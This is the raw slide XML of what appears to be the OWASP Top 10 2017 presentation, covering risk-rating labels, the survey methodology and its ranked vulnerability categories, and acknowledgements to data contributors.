                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0"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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>4.7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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A10:2017-I</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>nsufficient</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" kern="1200" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AVERAGE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2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lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>WIDESPREAD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1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>DIFFICULT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Wingdings"/>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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>MODERATE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>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900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>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Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>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76298178"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6553200"/>
          <a:ext cx="6858000" cy="25908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9606">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Additional Risks to Consider</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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311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aseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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(in alphabetical order) that you should additionally consider include</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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baseline="0" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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Prevalence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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Detectability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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Exploitability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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Technical</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219200" y="2262187"/>
            <a:ext cx="4887049" cy="533401"/>
            <a:chOff x="430949" y="1049627"/>
            <a:chExt cx="5604445" cy="596141"/>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a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Weakness</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="586847" y="1072156"/>
              <a:ext cx="139702" cy="304799"/>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a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>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a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial"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297517"/>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a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Threat</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial"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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Business</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Textplatzhalter 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>+RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Details About Risk Factors</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle: Rounded Corners 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94B94A4E-B1A5-47EC-811D-ED0E559DC71C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="7620000"/>
            <a:ext cx="6096000" cy="13716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000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TBD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This will be added post-RC2 after further data analysis is completed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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+Dat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methodology and Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="5410200"/>
            <a:ext cx="6172200" cy="3308598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Public Data Call</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial"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Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial"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 While not perfect, this reasonably allows us to compare the data from Human Assisted Tools and Tool Assisted Humans. The raw data and analysis work is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>available in GitHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>. We intend to expand on this with additional structure for 2020 (or earlier).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial"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Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Veracode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial"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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="990600"/>
            <a:ext cx="6172200" cy="1554272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>At the OWASP Project Summit, active participants and community members decided on a vulnerability view, with up to two (2) forward looking vulnerability classes, with ordering defined partially by quantitative data, and partially by qualitative surveys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Industry Ranked Survey</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial"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2017. The survey was open from Aug 2 – Sep 18, 2017. 516 responses were collected and the vulnerabilities were ranked.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="4006694"/>
            <a:ext cx="6172200" cy="1408078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Exposure of private information is clearly the highest-ranking vulnerability, but fits very easily as an additional emphasis into the existing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A3:2017-Sensitive Data Exposure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>. Cryptographic Failures can fit within Sensitive Data Exposure. Insecure deserialization was ranked at number three, so it was added to the Top 10 as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A8:2017-Insecure Deserialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> after risk rating. The fourth ranked User Controlled Key is included in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A5:2017-Broken Access Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial"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Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A10:2017-Insufficient Logging and Monitoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>. We have moved to a point where applications need to be able to define what may be an attack and generate appropriate logging, alerting, escalation and response. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Table 15"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2729242397"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457199" y="2670695"/>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1" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Rank</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1">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Survey Vulnerability Categories</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a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Score</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1</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Exposure of Private Information ('Privacy Violation') [CWE-359]</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748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2</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Cryptographic Failures [CWE-310/311/312/326/327]</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584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Deserialization of Untrusted Data [CWE-502]</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514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4</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Authorization Bypass Through User-Controlled Key (IDOR &amp; Path Traversal) [CWE-639]</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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>493</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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Insufficient Logging and Monitoring [CWE-223 / CWE-778]</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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>440</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Calibri"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sz="3600" dirty="0"/>
              <a:t>+Ack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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1962066259"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1047750"/>
          <a:ext cx="6858000" cy="804093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502639">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>Acknowledgements to Data Contributors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85981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00" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>We’d like to thank the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> many </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>organizations that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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br>
                      <a:endParaRPr lang="en-US" dirty="0"/>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00" u="none" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>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00" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>For the first time, all the data contributed to a Top 10 release, and the full list of contributors, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>is publicly available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0"/>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5334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mn-lt"/>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mn-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1450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u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
